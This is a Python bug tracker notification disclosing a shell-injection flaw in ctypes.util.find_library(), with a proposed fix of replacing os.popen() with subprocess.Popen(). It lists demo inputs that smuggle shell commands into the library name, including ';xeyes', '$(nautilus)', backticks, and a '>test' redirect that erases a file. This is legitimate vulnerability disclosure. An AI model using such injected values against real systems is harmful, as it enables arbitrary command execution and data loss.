New submission from Bernd Dietzel:
The find_library() function can execute code when special chars like ;|`<>$ are
in the name.
The "os.popen()" calls in the util.py script should be replaced with
"subprocess.Popen()".
Demo Exploits for Linux :
====================
>>> from ctypes.util import find_library
>>> find_library(";xeyes") # runs xeyes
>>> find_library("|xterm") # runs terminal
>>> find_library("&gimp") # runs gimp
>>> find_library("$(nautilus)") # runs filemanager
>>> find_library(">test") # creates, and if exists, erases a file "test"
==== Traceback ====
>>> find_library("`xmessage hello`") # shows a message, press ctrl+c for
>>> Traceback
^CTraceback (most recent call last):
File "<stdin>", line 1, in <module>
File "/usr/lib/python3.4/ctypes/util.py", line 244, in find_library
return _findSoname_ldconfig(name) or _get_soname(_findLib_gcc(name))
File "/usr/lib/python3.4/ctypes/util.py", line 99, in _findLib_gcc
trace = f.read()
KeyboardInterrupt
https://bugs.launchpad.net/ubuntu/+source/python2.7/+bug/1512068
----------
components: ctypes
files: workaround.diff
keywords: patch
messages: 255482
nosy: TheRegRunner
priority: normal
severity: normal
status: open
title: ctypes.util , Shell Injection in find_library()
type: security
versions: Python 2.7, Python 3.4
Added file: http://bugs.python.org/file41174/workaround.diff
_______________________________________
Python tracker <rep...@bugs.python.org>
<http://bugs.python.org/issue25751>
_______________________________________
_______________________________________________
Python-bugs-list mailing list
Unsubscribe:
https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
